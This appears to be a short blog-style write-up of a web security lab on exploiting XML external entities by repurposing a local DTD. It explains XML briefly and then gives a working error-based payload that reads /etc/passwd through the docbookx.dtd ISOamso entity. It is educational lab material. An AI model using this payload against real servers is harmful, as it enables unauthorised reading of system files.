Exploiting XXE to retrieve data by repurposing a local DTD

Hello My Friend,

I wanted to share How I solved this lab for the Sake Of Spreading Knowledge

First, let’s talk a little about what XML is.

XML, akin to HTML and SGML, is a widely used markup language crafted for versatile data and document transfer and storage across different applications. Unlike HTML, which focuses on data display, XML prioritizes data storage and structure representation. XML documents consist of element trees, each identified by a tag. The initial element is termed the root element, while subsequent elements are called child elements.

Example of an XML Document representing and user structure:

<?xml version="1.0"?>
<users>
    <user>
       <!-- child elements here -->
        <username>admin</username>
        <password>secrte</password>
        <group>Administrator</group>
    </user>
     <user>
        <username>h3ckt00r</username>
        <password>secrtehacktor</password>
        <group>users</group>
    </user>
<users>

The above example shows some of the key elements of an XML document, like:

Now that we understand it, let’s go into the solution.

Let’s go to the website and search for a bit. You will find a parameter called check stock. Click and let’s go to Burpsuite.

check Stock button

Hint

Now I will go call docbookx.dtd and from within I will take the entity called ISOanso and I will go and create another entity and make a call to /etc/passwd and after that I will create another entity and look in it for any error that appears and after that I will call Reference of the first entity. Come on, let’s see the failure. It will make you understand, my friend.

<!DOCTYPE h3ckt00r [ 
<!ENTITY % read SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY  &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY  &#x25; eval  "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%read;
]>

B000000M!

Thanks for reading, Hope you guys liked it.